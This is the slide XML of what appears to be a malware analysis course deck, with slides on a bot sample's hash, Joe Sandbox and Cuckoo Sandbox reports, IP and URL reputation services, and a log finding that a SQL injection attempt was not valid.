            <a:ext cx="9091278" cy="4683125"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2041959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829-38A6-3640-9D24-38CE6DA4742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2D88CA22-429B-C247-9C6F-EDD7DD803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7620000" cy="2483664"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{93DA9F67-C5EE-C547-80EB-3988E676E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7364"/>
            <a:ext cx="9144000" cy="3097871"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3591142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D71E-4560-9744-A06E-83B6F9A7198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6DAD77B4-967E-1F45-9656-F097C15B3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74651"/>
            <a:ext cx="9097176" cy="4625974"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="361443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F56A-D165-6F48-90F6-4A71E5868E77}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="0"/>
            <a:ext cx="7972425" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>enpm685-bot-v2.exe</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>SHA256: 689b6574eaf549cd97e7d2ac8c2eb4f2c2477acdda7dbcc5a6883f8ae09dff2c</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Content Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{16FB6939-CC7B-1A42-AF1C-E7DA6FC48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071" y="871537"/>
            <a:ext cx="6450417" cy="5957009"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1363489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2F70-EF18-7445-858B-2CCA4EA64B33}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Joe Sandbox</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{197F3AED-B779-F04C-8F04-0E9C4F3D2E06}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://www.joesandbox.com/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Free Community Edition (15 analyses/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> w limited output)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Commercial Edition </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Windows, macOS, Linux, iOS, Android</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2863485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7E93-4CA0-A1EF-6F85-9C5A3898EFD3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Joe Sandbox Sample Report</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F794A43E-A3FD-1A98-A3DC-EF8AF785B567}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Agent Tesla</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://www.joesandbox.com/analysis/614122/0/html</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6FBD53C7-44D7-3E18-4F53-FDB67772F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2768"/>
            <a:ext cx="9144000" cy="3688032"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3951559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7CFF-A009-0B7F-C7EC-C2355C67710A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Joe Sandbox Sample Report</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Content Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{003C9855-F01D-0C1F-A881-72C289A8A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46315"/>
            <a:ext cx="9130730" cy="3868334"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1791853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A5AD-5C1F-D3BA-787A-8A5892164487}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Joe Sandbox Sample Report</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Content Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6AF81857-13C7-F6B2-C878-15BFB70B3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991" y="1600200"/>
            <a:ext cx="7192418" cy="4800600"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2434115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646E-7213-35ED-11AF-6886EACDC55A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Joe Sandbox Sample Report</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Content Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2DB49B69-9196-E29E-15CC-25E976E72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50352"/>
            <a:ext cx="7620000" cy="3700295"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="141864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21836"/>
            <a:ext cx="7620000" cy="3757327"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1494919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D653-B6BA-4241-BBD8-C3408F6A9B4F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>Cuckoo Sandbox</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1C109776-00EE-D247-9779-08FD13E1E2B4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1543050"/>
            <a:ext cx="3871913" cy="4414838"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://cuckoosandbox.org/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Open source automated malware analysis tool</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Like other solutions it can process .exes, typical office documents, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Also review malicious URLs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Hooks to export memory dumps into Volatility, YARA, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{03969DE7-464F-194B-A0C7-271E29BB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913" y="57347"/>
            <a:ext cx="5272087" cy="6572053"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="27589684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E0EEF-795F-8146-B490-041EC75EE8E0}"/>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4DB69E2-1D4B-8443-8389-9045C51D5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88" y="274638"/>
            <a:ext cx="9080058" cy="5126037"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="259674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BAA1-EA3F-164E-A49B-91EC40F86D0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D7BF9B69-231D-3E4B-9B67-A9906CF82D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49" y="274638"/>
            <a:ext cx="8986387" cy="5126037"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3478928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BED8-BBDE-9040-887D-F2EBB2D120D8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Content Placeholder 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1310055E-6086-AE4E-A4B3-3F6558945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241" y="100013"/>
            <a:ext cx="8715722" cy="6695482"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1968411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770A-C244-7A4E-B73A-EB94311D33D6}"/>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FFB02706-4630-E545-AE02-86B7078E8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591" y="274638"/>
            <a:ext cx="8467921" cy="6427062"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2016360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AD64-7A8A-E148-9AE2-4F9E70E031E4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Automatic IP/URL analyzers </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{199FAC04-5520-DA48-B05D-38D8A62CF560}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>VirusTotal</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>urlquery.net</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>urlscan.io</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>greynoise.io</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>censys.io</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>threatminer.org</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>abuse.ch</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>…</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4216571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207C-346C-5F42-BBC5-A2E237DFBF61}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>VirusTotal</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C617509B-FA40-014D-8BEB-47B602C35C8E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Sample URL: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://www.virustotal.com/#/url/29a3c222fb8695b4a00f6ef3c0ffd13ecca795de9640b6ab87bf4659bd0ad438/detection</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0FD8A83A-A5CA-064D-9C1A-2555C03B5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4" y="2786001"/>
            <a:ext cx="7115176" cy="3957700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1795733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F6BC-977B-B340-A756-50BA927DB51C}"/>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9491FE39-EBA7-DE4F-936B-F993FA3D40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97" y="0"/>
            <a:ext cx="4172603" cy="3342662"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6289150E-5E48-464C-A5B9-989614C63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72" y="3342662"/>
            <a:ext cx="8792228" cy="3414164"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3953283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58B5-2D67-1544-818D-D4281A540346}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>urlquery.net</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F4F84E09-8FE4-0546-8D3E-0D14A75BE41C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1200150"/>
            <a:ext cx="7620000" cy="4800600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Sample report: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://urlquery.net/report/2f2c54a8-980c-485b-8cac-3a44c080bc2d</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A183C4AF-75BF-2740-A503-ADE0FA1A9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989136"/>
            <a:ext cx="7258050" cy="4508564"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="428549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C177-51CA-024A-8A53-07ADD778562D}"/>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A7B13464-7E35-9042-9893-443E7A3E4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76837"/>
            <a:ext cx="8686800" cy="6681163"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="365461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normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Analysis:  tested SQL injection vulnerability, was not valid.  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>(Possible follow up: add to ignore list)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3143030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0F6F-E91A-3340-AE5B-1AAE0D7F0316}"/>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08E6EB3-C4E6-2E47-9E12-26D850D9A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4" y="1872254"/>
            <a:ext cx="8546667" cy="3299822"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="773673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E822-C116-3342-BF5E-03987874B769}"/>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DB330070-0513-5141-A866-1419CDB0E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52213"/>
